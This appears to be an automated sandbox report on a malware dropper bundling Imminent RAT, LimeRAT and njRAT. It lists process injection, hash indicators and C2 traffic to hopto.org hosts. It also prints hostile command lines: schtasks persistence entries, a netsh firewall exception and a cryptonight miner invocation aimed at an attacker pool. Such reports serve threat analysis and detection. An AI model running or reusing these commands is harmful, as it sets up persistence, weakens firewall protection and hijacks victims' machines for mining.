PID 2500 wrote to memory of 2360 N/A C:\Users\Admin\AppData\Local\Temp\cleaner.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
PID 2500 wrote to memory of 2360 N/A C:\Users\Admin\AppData\Local\Temp\cleaner.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
PID 2500 wrote to memory of 2360 N/A C:\Users\Admin\AppData\Local\Temp\cleaner.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
PID 2500 wrote to memory of 2360 N/A C:\Users\Admin\AppData\Local\Temp\cleaner.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
PID 2500 wrote to memory of 2360 N/A C:\Users\Admin\AppData\Local\Temp\cleaner.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
PID 2500 wrote to memory of 2360 N/A C:\Users\Admin\AppData\Local\Temp\cleaner.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
PID 2500 wrote to memory of 2360 N/A C:\Users\Admin\AppData\Local\Temp\cleaner.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
PID 2500 wrote to memory of 2360 N/A C:\Users\Admin\AppData\Local\Temp\cleaner.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
PID 2696 wrote to memory of 2732 N/A C:\Users\Admin\AppData\Local\Temp\0ed1010a80a3e115d7800f2618e8b7dc_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\μTorrent.exe
PID 2696 wrote to memory of 2732 N/A C:\Users\Admin\AppData\Local\Temp\0ed1010a80a3e115d7800f2618e8b7dc_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\μTorrent.exe
PID 2696 wrote to memory of 2732 N/A C:\Users\Admin\AppData\Local\Temp\0ed1010a80a3e115d7800f2618e8b7dc_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\μTorrent.exe
PID 2696 wrote to memory of 2732 N/A C:\Users\Admin\AppData\Local\Temp\0ed1010a80a3e115d7800f2618e8b7dc_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\μTorrent.exe
PID 2500 wrote to memory of 2412 N/A C:\Users\Admin\AppData\Local\Temp\cleaner.exe C:\Windows\SysWOW64\schtasks.exe
PID 2500 wrote to memory of 2412 N/A C:\Users\Admin\AppData\Local\Temp\cleaner.exe C:\Windows\SysWOW64\schtasks.exe
PID 2500 wrote to memory of 2412 N/A C:\Users\Admin\AppData\Local\Temp\cleaner.exe C:\Windows\SysWOW64\schtasks.exe
PID 2500 wrote to memory of 2412 N/A C:\Users\Admin\AppData\Local\Temp\cleaner.exe C:\Windows\SysWOW64\schtasks.exe
PID 2696 wrote to memory of 2856 N/A C:\Users\Admin\AppData\Local\Temp\0ed1010a80a3e115d7800f2618e8b7dc_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\Project1.exe
PID 2696 wrote to memory of 2856 N/A C:\Users\Admin\AppData\Local\Temp\0ed1010a80a3e115d7800f2618e8b7dc_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\Project1.exe
PID 2696 wrote to memory of 2856 N/A C:\Users\Admin\AppData\Local\Temp\0ed1010a80a3e115d7800f2618e8b7dc_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\Project1.exe
PID 2696 wrote to memory of 2856 N/A C:\Users\Admin\AppData\Local\Temp\0ed1010a80a3e115d7800f2618e8b7dc_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\Project1.exe
PID 2696 wrote to memory of 1972 N/A C:\Users\Admin\AppData\Local\Temp\0ed1010a80a3e115d7800f2618e8b7dc_JaffaCakes118.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 2696 wrote to memory of 1972 N/A C:\Users\Admin\AppData\Local\Temp\0ed1010a80a3e115d7800f2618e8b7dc_JaffaCakes118.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 2696 wrote to memory of 1972 N/A C:\Users\Admin\AppData\Local\Temp\0ed1010a80a3e115d7800f2618e8b7dc_JaffaCakes118.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 2696 wrote to memory of 1972 N/A C:\Users\Admin\AppData\Local\Temp\0ed1010a80a3e115d7800f2618e8b7dc_JaffaCakes118.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 2696 wrote to memory of 1972 N/A C:\Users\Admin\AppData\Local\Temp\0ed1010a80a3e115d7800f2618e8b7dc_JaffaCakes118.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 2696 wrote to memory of 1972 N/A C:\Users\Admin\AppData\Local\Temp\0ed1010a80a3e115d7800f2618e8b7dc_JaffaCakes118.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 2696 wrote to memory of 1972 N/A C:\Users\Admin\AppData\Local\Temp\0ed1010a80a3e115d7800f2618e8b7dc_JaffaCakes118.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 2696 wrote to memory of 1972 N/A C:\Users\Admin\AppData\Local\Temp\0ed1010a80a3e115d7800f2618e8b7dc_JaffaCakes118.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 2696 wrote to memory of 1972 N/A C:\Users\Admin\AppData\Local\Temp\0ed1010a80a3e115d7800f2618e8b7dc_JaffaCakes118.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 2696 wrote to memory of 2708 N/A C:\Users\Admin\AppData\Local\Temp\0ed1010a80a3e115d7800f2618e8b7dc_JaffaCakes118.exe C:\Windows\SysWOW64\schtasks.exe
PID 2696 wrote to memory of 2708 N/A C:\Users\Admin\AppData\Local\Temp\0ed1010a80a3e115d7800f2618e8b7dc_JaffaCakes118.exe C:\Windows\SysWOW64\schtasks.exe
PID 2696 wrote to memory of 2708 N/A C:\Users\Admin\AppData\Local\Temp\0ed1010a80a3e115d7800f2618e8b7dc_JaffaCakes118.exe C:\Windows\SysWOW64\schtasks.exe
PID 2696 wrote to memory of 2708 N/A C:\Users\Admin\AppData\Local\Temp\0ed1010a80a3e115d7800f2618e8b7dc_JaffaCakes118.exe C:\Windows\SysWOW64\schtasks.exe
PID 2760 wrote to memory of 808 N/A C:\Users\Admin\AppData\Local\Temp\Torrent.exe C:\Windows\system32\WerFault.exe
PID 2760 wrote to memory of 808 N/A C:\Users\Admin\AppData\Local\Temp\Torrent.exe C:\Windows\system32\WerFault.exe
PID 2760 wrote to memory of 808 N/A C:\Users\Admin\AppData\Local\Temp\Torrent.exe C:\Windows\system32\WerFault.exe
PID 2732 wrote to memory of 2084 N/A C:\Users\Admin\AppData\Local\Temp\μTorrent.exe C:\Users\Admin\AppData\Local\Temp\NetFramework.exe
PID 2732 wrote to memory of 2084 N/A C:\Users\Admin\AppData\Local\Temp\μTorrent.exe C:\Users\Admin\AppData\Local\Temp\NetFramework.exe
PID 2732 wrote to memory of 2084 N/A C:\Users\Admin\AppData\Local\Temp\μTorrent.exe C:\Users\Admin\AppData\Local\Temp\NetFramework.exe
PID 1972 wrote to memory of 3000 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\SysWOW64\taskmgr.exe
PID 1972 wrote to memory of 3000 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\SysWOW64\taskmgr.exe
PID 1972 wrote to memory of 3000 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\SysWOW64\taskmgr.exe
PID 1972 wrote to memory of 3000 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\SysWOW64\taskmgr.exe
PID 2084 wrote to memory of 1704 N/A C:\Users\Admin\AppData\Local\Temp\NetFramework.exe C:\Windows\explorer.exe
PID 2084 wrote to memory of 1704 N/A C:\Users\Admin\AppData\Local\Temp\NetFramework.exe C:\Windows\explorer.exe
PID 2084 wrote to memory of 1704 N/A C:\Users\Admin\AppData\Local\Temp\NetFramework.exe C:\Windows\explorer.exe
PID 2084 wrote to memory of 1704 N/A C:\Users\Admin\AppData\Local\Temp\NetFramework.exe C:\Windows\explorer.exe
PID 2084 wrote to memory of 1704 N/A C:\Users\Admin\AppData\Local\Temp\NetFramework.exe C:\Windows\explorer.exe
PID 2084 wrote to memory of 1704 N/A C:\Users\Admin\AppData\Local\Temp\NetFramework.exe C:\Windows\explorer.exe
PID 2084 wrote to memory of 1704 N/A C:\Users\Admin\AppData\Local\Temp\NetFramework.exe C:\Windows\explorer.exe
PID 1620 wrote to memory of 2036 N/A C:\Windows\system32\taskeng.exe C:\Users\Admin\AppData\Roaming\browserbroker\djoin.exe

Processes

C:\Users\Admin\AppData\Local\Temp\0ed1010a80a3e115d7800f2618e8b7dc_JaffaCakes118.exe

"C:\Users\Admin\AppData\Local\Temp\0ed1010a80a3e115d7800f2618e8b7dc_JaffaCakes118.exe"

C:\Users\Admin\AppData\Local\Temp\Ccleaner.exe

"C:\Users\Admin\AppData\Local\Temp\Ccleaner.exe"

C:\Users\Admin\AppData\Local\Temp\cleaner.exe

"C:\Users\Admin\AppData\Local\Temp\cleaner.exe"

C:\Users\Admin\AppData\Local\Temp\Torrent.exe

"C:\Users\Admin\AppData\Local\Temp\Torrent.exe"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe"

C:\Users\Admin\AppData\Local\Temp\μTorrent.exe

"C:\Users\Admin\AppData\Local\Temp\μTorrent.exe"

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\SysWOW64\schtasks.exe" /create /tn SettingSyncHost /tr "C:\Users\Admin\secinit\sdchange.exe" /sc minute /mo 1 /F

C:\Users\Admin\AppData\Local\Temp\Project1.exe

"C:\Users\Admin\AppData\Local\Temp\Project1.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\SysWOW64\schtasks.exe" /create /tn ApplicationFrameHost /tr "C:\Users\Admin\AppData\Roaming\browserbroker\djoin.exe" /sc minute /mo 1 /F

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -u -p 2760 -s 908

C:\Users\Admin\AppData\Local\Temp\NetFramework.exe

"C:\Users\Admin\AppData\Local\Temp\NetFramework.exe"

C:\Windows\SysWOW64\taskmgr.exe

"C:\Windows\System32\taskmgr.exe"

C:\Windows\explorer.exe

C:\Windows\explorer.exe -a cryptonight --url=redlan.hopto.org:3333 -p #PWD -R --variant=-1 -u GuyFlawkesMinerAdmin -k -t 4 --max-cpu-usage=50

C:\Windows\system32\wbem\WmiApSrv.exe

C:\Windows\system32\wbem\WmiApSrv.exe

C:\Windows\system32\taskeng.exe

taskeng.exe {913C5337-C9FA-48A7-9B90-677D9C593C6D} S-1-5-21-330940541-141609230-1670313778-1000:KXIPPCKF\Admin:Interactive:[1]

C:\Users\Admin\AppData\Roaming\browserbroker\djoin.exe

C:\Users\Admin\AppData\Roaming\browserbroker\djoin.exe

C:\Users\Admin\secinit\sdchange.exe

C:\Users\Admin\secinit\sdchange.exe

C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe"

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\SysWOW64\schtasks.exe" /create /tn SettingSyncHost /tr "C:\Users\Admin\secinit\sdchange.exe" /sc minute /mo 1 /F

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\SysWOW64\schtasks.exe" /create /tn ApplicationFrameHost /tr "C:\Users\Admin\AppData\Roaming\browserbroker\djoin.exe" /sc minute /mo 1 /F

C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe"

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\SysWOW64\schtasks.exe" /create /tn backgroundTaskHost /tr "C:\Users\Admin\AppData\Local\Temp\RdpSaUacHelper\data.exe" /sc minute /mo 1 /F

C:\Windows\SysWOW64\netsh.exe

netsh firewall add allowedprogram "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe" "RegAsm.exe" ENABLE

C:\Users\Admin\AppData\Local\Temp\RdpSaUacHelper\data.exe

C:\Users\Admin\AppData\Local\Temp\RdpSaUacHelper\data.exe

C:\Users\Admin\AppData\Roaming\browserbroker\djoin.exe

C:\Users\Admin\AppData\Roaming\browserbroker\djoin.exe

C:\Users\Admin\secinit\sdchange.exe

C:\Users\Admin\secinit\sdchange.exe

C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe"

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\SysWOW64\schtasks.exe" /create /tn SettingSyncHost /tr "C:\Users\Admin\secinit\sdchange.exe" /sc minute /mo 1 /F

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\SysWOW64\schtasks.exe" /create /tn ApplicationFrameHost /tr "C:\Users\Admin\AppData\Roaming\browserbroker\djoin.exe" /sc minute /mo 1 /F

C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe"

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\SysWOW64\schtasks.exe" /create /tn backgroundTaskHost /tr "C:\Users\Admin\AppData\Local\Temp\RdpSaUacHelper\data.exe" /sc minute /mo 1 /F

Network

Country Destination Domain Proto
US 8.8.8.8:53 api.ipify.org udp
US 8.8.8.8:53 nandos.hopto.org udp
US 104.26.13.205:80 api.ipify.org tcp
US 184.105.237.195:9003 nandos.hopto.org tcp
US 8.8.8.8:53 redlan.hopto.org udp
US 184.105.237.195:3333 redlan.hopto.org tcp
US 8.8.8.8:53 pastebin.com udp
US 104.20.3.235:443 pastebin.com tcp
US 184.105.237.195:9003 redlan.hopto.org tcp
US 184.105.237.195:3333 redlan.hopto.org tcp
US 184.105.237.195:9003 redlan.hopto.org tcp
US 184.105.237.195:5553 redlan.hopto.org tcp
US 184.105.237.195:9003 redlan.hopto.org tcp
US 184.105.237.195:3333 redlan.hopto.org tcp
US 184.105.237.195:9003 redlan.hopto.org tcp
US 184.105.237.195:5553 redlan.hopto.org tcp
US 184.105.237.195:3333 redlan.hopto.org tcp
US 184.105.237.195:9003 redlan.hopto.org tcp
US 184.105.237.195:9003 redlan.hopto.org tcp
US 184.105.237.195:5553 redlan.hopto.org tcp
US 184.105.237.195:3333 redlan.hopto.org tcp
US 184.105.237.195:9003 redlan.hopto.org tcp
US 184.105.237.195:5553 redlan.hopto.org tcp
US 184.105.237.195:9003 redlan.hopto.org tcp
US 184.105.237.195:3333 redlan.hopto.org tcp

Files

\Users\Admin\AppData\Local\Temp\Ccleaner.exe

MD5 d18ce77a75017e627de41febd9e289ee
SHA1 012a66d318e8294492accc0beca42c9999b68146
SHA256 7d6e025a8d510b10988375f020c60efec7d6ee77367ed8879e8a3b1172a5efd4
SHA512 c5f24a7f7c9e8ed552aa6402539171551851afd86b85b28e4018c2c8cd38c4ed22cb726eec5f750d90a25343e61e1cc97c62b1a486cbac6e04b777886411c86f

\Users\Admin\AppData\Local\Temp\cleaner.exe

MD5 b4bae96dc11834b254ec53b2cdba13aa
SHA1 7b67438093eb1860237bf88aefebf56bb9333aba
SHA256 bcd5d4c36ee50d99d6ae1aa91c0c12569f711d37e7b59a3483f413c7c2b68142
SHA512 ea2b93b7f9046e931812ab8efd364502d936ad28fa174f1c63d79fa46bedc5bbbf3476c0b551e40ae75bf82cbb3c5a107e41b49aeb6cd0b5fc294a5813519eda

\Users\Admin\AppData\Local\Temp\Torrent.exe

MD5 cedb1319e9cbd45f4cc69e58699009d3
SHA1 ef66c3f343744a6afa9b9955d65e6ccaba41c27e
SHA256 5f61384bf58773755f2ae7500b1e24b1394df6b69c80d240ad0731842c908808
SHA512 bb204c60f138e4a341a6eafed2b39409105805e391bea572e5df0d8f0a24e5af8e2d2da9fedb26460adef321079efbe8443fa08bb0e0b3702e6478452bb26bd8

memory/2360-45-0x0000000000400000-0x000000000040C000-memory.dmp

memory/2360-44-0x0000000000400000-0x000000000040C000-memory.dmp

memory/2360-42-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

memory/2360-39-0x0000000000400000-0x000000000040C000-memory.dmp

memory/2360-37-0x0000000000400000-0x000000000040C000-memory.dmp

\Users\Admin\AppData\Local\Temp\μTorrent.exe

MD5 7e962cb55be5963163d4f6a21100950c
SHA1 f58ad41f8c86b9cffc7d66f4991162f731926d1d
SHA256 1e6af101af20d01594ae2d42d066198b7e226546e6cd9f37594783618e758968
SHA512 757996c16752816850607d4ef1cb12e002133c73a2c431ef735aa56f01bf33a6ea4e2725556e2a53a4603552348477fa72c286afdf1fd605ea5f8671b2486b3a

\Users\Admin\AppData\Local\Temp\Project1.exe

MD5 1166591fc5f77c463d176bcca574efff
SHA1 35d710b8983945aaf8c39d289fd6c73ed1f00b65
SHA256 a51c6e6c19be022dcbf235a9bebeab1b73292e2ee40b48653e80b96f10aa9bad
SHA512 751f5cf2cc5316ddbbba2805ac9c3fee24d80a85c92587c85ac80a2033aaeef96f58bcb5053584bcea7ad8fcb538183da9d29360f44666e1bfd3bdf0f08caa97

memory/2760-69-0x0000000000DE0000-0x00000000014C6000-memory.dmp

memory/2856-81-0x0000000002380000-0x00000000024C0000-memory.dmp

memory/2856-123-0x0000000002380000-0x00000000024C0000-memory.dmp

memory/2732-133-0x0000000000860000-0x0000000000F46000-memory.dmp

memory/2856-122-0x0000000002380000-0x00000000024C0000-memory.dmp

memory/2856-121-0x00000000036B0000-0x00000000036B1000-memory.dmp

memory/2856-119-0x0000000002380000-0x00000000024C0000-memory.dmp

memory/2856-118-0x00000000036A0000-0x00000000036A1000-memory.dmp

memory/2856-117-0x0000000002380000-0x00000000024C0000-memory.dmp

memory/2856-116-0x0000000002380000-0x00000000024C0000-memory.dmp

memory/2856-115-0x0000000003690000-0x0000000003691000-memory.dmp

memory/2856-114-0x0000000002380000-0x00000000024C0000-memory.dmp

memory/2856-113-0x0000000002380000-0x00000000024C0000-memory.dmp

memory/2856-112-0x0000000003680000-0x0000000003681000-memory.dmp

memory/2856-111-0x0000000002380000-0x00000000024C0000-memory.dmp

memory/2856-110-0x0000000002380000-0x00000000024C0000-memory.dmp

memory/2856-109-0x0000000003670000-0x0000000003671000-memory.dmp

memory/2856-107-0x0000000002380000-0x00000000024C0000-memory.dmp

memory/2856-106-0x0000000003660000-0x0000000003661000-memory.dmp

memory/2856-104-0x0000000002380000-0x00000000024C0000-memory.dmp

memory/2856-102-0x0000000002380000-0x00000000024C0000-memory.dmp

memory/2856-101-0x0000000002380000-0x00000000024C0000-memory.dmp

memory/2856-100-0x0000000003640000-0x0000000003641000-memory.dmp

memory/2856-98-0x0000000002380000-0x00000000024C0000-memory.dmp

memory/2856-97-0x0000000003630000-0x0000000003631000-memory.dmp

memory/2856-96-0x0000000002380000-0x00000000024C0000-memory.dmp

memory/2856-95-0x0000000002380000-0x00000000024C0000-memory.dmp

memory/2856-94-0x0000000003620000-0x0000000003621000-memory.dmp

memory/1972-144-0x0000000000400000-0x0000000000456000-memory.dmp

memory/2856-92-0x0000000002380000-0x00000000024C0000-memory.dmp

memory/2856-91-0x0000000003610000-0x0000000003611000-memory.dmp

memory/2856-90-0x0000000002380000-0x00000000024C0000-memory.dmp

memory/2856-89-0x0000000002380000-0x00000000024C0000-memory.dmp

memory/2856-88-0x0000000003600000-0x0000000003601000-memory.dmp

memory/2856-87-0x0000000002380000-0x00000000024C0000-memory.dmp

memory/2856-86-0x0000000002380000-0x00000000024C0000-memory.dmp

memory/2856-85-0x00000000035F0000-0x00000000035F1000-memory.dmp

memory/2856-84-0x0000000002380000-0x00000000024C0000-memory.dmp

memory/2856-83-0x0000000002380000-0x00000000024C0000-memory.dmp

memory/2856-82-0x00000000035E0000-0x00000000035E1000-memory.dmp

memory/2856-80-0x0000000002380000-0x00000000024C0000-memory.dmp

memory/2856-79-0x00000000035D0000-0x00000000035D1000-memory.dmp

memory/2856-78-0x0000000002380000-0x00000000024C0000-memory.dmp

memory/2856-77-0x0000000002380000-0x00000000024C0000-memory.dmp

memory/2856-76-0x00000000035C0000-0x00000000035C1000-memory.dmp

memory/2856-75-0x0000000002380000-0x00000000024C0000-memory.dmp

memory/2856-74-0x0000000002380000-0x00000000024C0000-memory.dmp

memory/2856-73-0x0000000000F60000-0x0000000000F61000-memory.dmp

memory/2856-124-0x00000000036C0000-0x00000000036C1000-memory.dmp

memory/2856-120-0x0000000002380000-0x00000000024C0000-memory.dmp

memory/2856-108-0x0000000002380000-0x00000000024C0000-memory.dmp

memory/1972-145-0x0000000000380000-0x0000000000390000-memory.dmp

memory/2856-105-0x0000000002380000-0x00000000024C0000-memory.dmp

memory/2856-103-0x0000000003650000-0x0000000003651000-memory.dmp

memory/2856-99-0x0000000002380000-0x00000000024C0000-memory.dmp

memory/1972-146-0x0000000004750000-0x00000000047FE000-memory.dmp

memory/2856-71-0x0000000002380000-0x00000000024C0000-memory.dmp

memory/1972-147-0x00000000004A0000-0x00000000004C8000-memory.dmp

memory/2856-70-0x0000000000F50000-0x0000000000F51000-memory.dmp

memory/2856-93-0x0000000002380000-0x00000000024C0000-memory.dmp

memory/2856-72-0x0000000002380000-0x00000000024C0000-memory.dmp

memory/2760-151-0x000000001C580000-0x000000001CC22000-memory.dmp

memory/2084-161-0x0000000000C80000-0x0000000001366000-memory.dmp

memory/1972-164-0x00000000007B0000-0x00000000007C6000-memory.dmp

memory/2084-175-0x0000000000370000-0x0000000000378000-memory.dmp

C:\Users\Admin\AppData\Roaming\browserbroker\djoin.exe

MD5 2c6de43d15f1b20458e872426b8c2f3b
SHA1 59aa9c29ce5f9de0a4f94e9ca9c481e38ec12812
SHA256 47fb7cd4c9a8fe197d116a4349f1f771281ad2001a2c1f4f375397d9ae240b80
SHA512 c3a572a56da4aab249e53939569b724b9977e9a6bfe2a4d4fa84cdaa9bd50c66d4775e3428fe98c2e4aab9fab33ed6be4ebfda67682ac1ef1d69a71817d673cf

C:\Users\Admin\secinit\sdchange.exe

MD5 3d4bef564c7cee3d9e50b08c7960d7d3
SHA1 7c00609716cc504d70074ae24a161ac993667a04
SHA256 576bfe39ec2b74c192f1e836286d314fb71436203637b9e59823de7f222f90ef
SHA512 728a8b819641c3fd148a99499bc17db3d057d72354a1a9833317d8a8e58e25466ef2b145339108ba89b3176bc54ba409a6bc3a440ee715d4a6f4575f09a643c1

memory/1972-229-0x0000000000550000-0x000000000055C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\RdpSaUacHelper\data.exe

MD5 d9010104680ccf3e08f455aa39f1115a
SHA1 53e105e2858bf82f12a4908651a6f96222e28da1
SHA256 10ec7c2a92727abcae9918b0b7b7a8cbd3f231e9fef2dedbc376a2dba98fd6e8
SHA512 6feea4272e8acdbb9ea8cff56e196131d7a6d93da61b68a6403b4f3d01c2e9770a2c058aae0405f9aaac150f4dcd4241e5b08056fdf114b5b2b3f8e8cb0a5bb2

C:\Users\Admin\AppData\Local\Temp\μTorrent.exe

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Analysis: behavioral2

Detonation Overview

Submitted

2024-05-02 14:58

Reported

2024-05-02 15:00

Platform

win10v2004-20240419-en

Max time kernel

149s

Max time network

151s

Command Line

"C:\Users\Admin\AppData\Local\Temp\0ed1010a80a3e115d7800f2618e8b7dc_JaffaCakes118.exe"

Signatures

Imminent RAT

trojan spyware imminent

LimeRAT

rat limerat

njRAT/Bladabindi

trojan njrat

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2860750803-256193626-1801997576-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Roaming\browserbroker\djoin.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2860750803-256193626-1801997576-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\0ed1010a80a3e115d7800f2618e8b7dc_JaffaCakes118.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2860750803-256193626-1801997576-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\cleaner.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2860750803-256193626-1801997576-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Torrent.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2860750803-256193626-1801997576-1000\Control Panel\International\Geo\Nation C:\Users\Admin\secinit\sdchange.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2860750803-256193626-1801997576-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Roaming\browserbroker\djoin.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2860750803-256193626-1801997576-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Ccleaner.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2860750803-256193626-1801997576-1000\Control Panel\International\Geo\Nation C:\Users\Admin\secinit\sdchange.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Ccleaner.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\cleaner.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Torrent.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\μTorrent.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Project1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\NetFramework.exe N/A
N/A N/A C:\Users\Admin\secinit\sdchange.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\browserbroker\djoin.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RdpSaUacHelper\data.exe N/A
N/A N/A C:\Users\Admin\secinit\sdchange.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\browserbroker\djoin.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2860750803-256193626-1801997576-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\NetFramework.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\NetFramework.exe" C:\Users\Admin\AppData\Local\Temp\Torrent.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A

Maps connected drives based on registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe N/A

AutoIT Executable

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 1560 set thread context of 1960 N/A C:\Users\Admin\AppData\Local\Temp\0ed1010a80a3e115d7800f2618e8b7dc_JaffaCakes118.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 3104 set thread context of 3252 N/A C:\Users\Admin\AppData\Local\Temp\cleaner.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
PID 3316 set thread context of 456 N/A C:\Users\Admin\AppData\Local\Temp\μTorrent.exe C:\Windows\explorer.exe
PID 904 set thread context of 2432 N/A C:\Users\Admin\secinit\sdchange.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
PID 856 set thread context of 2728 N/A C:\Users\Admin\AppData\Roaming\browserbroker\djoin.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 1348 set thread context of 4960 N/A C:\Users\Admin\AppData\Local\Temp\Ccleaner.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
PID 3840 set thread context of 4320 N/A C:\Users\Admin\secinit\sdchange.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
PID 4276 set thread context of 3052 N/A C:\Users\Admin\AppData\Roaming\browserbroker\djoin.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Enumerates physical storage devices

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\Project1.exe

Checks SCSI registry key(s)

Description Indicator Process Target
